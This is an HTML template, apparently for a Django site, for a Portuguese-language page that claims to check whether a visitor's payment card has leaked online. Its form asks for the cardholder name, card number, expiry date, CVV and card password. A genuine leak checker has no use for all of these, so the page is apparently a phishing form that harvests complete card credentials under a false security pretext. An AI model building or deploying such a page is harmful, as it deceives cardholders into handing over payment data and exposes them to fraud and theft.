<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verifique se seu cartão vazou na internet</title>
    <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Share Tech Mono', monospace;
            background-color: rgb(54, 39, 93);
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fbfbfb;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 300px;
        }
        .container h1 {
            font-size: 20px;
            margin-bottom: 20px;
            text-align: center;
        }
        .container label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
            font-size: 14px;
        }
        .container input {
            width: 100%;
            padding: 8px;
            margin-bottom: 15px;
            border: 2px solid #090404;
            border-radius: 3px;
            box-sizing: border-box;
        }
        .container button {
            font-family: 'Share Tech Mono', monospace;
            width: 60%;
            padding: 8px;
            margin: 10px auto;
            display: block;
            background-color:rgb(35, 116, 209);
            color: #050202;
            border: 2px solid #090404;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.5s ease, color 0.5s ease;
            font-size: 14px;
        }
        .container button:hover {
            background-color:rgb(255, 0, 0);
            color: #ffffff;
            box-shadow: 0 0 8px rgb(255, 0, 0);
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Verifique se seu cartão vazou na internet</h1>
        <form method="post">
            {% csrf_token %}
            <label for="nome">Nome do Titular</label>
            <input type="text" id="nome" name="nome_titular" required>
 
            <label for="numero">Número do Cartão</label>
            <input type="text" id="numero" name="numero_cartao" required>
 
            <label for="validade">Data de Validade</label>
            <input type="text" id="validade" name="data_validade" required>
 
            <label for="cvv">Código de Segurança (CVV)</label>
            <input type="password" id="cvv" name="codigo_seguranca" required>
 
            <label for="senha">Senha do Cartão</label>
            <input type="password" id="senha" name="senha_cartao" required>
 
            <button type="submit">Verificar</button>
        </form>
    </div>
</body>
</html>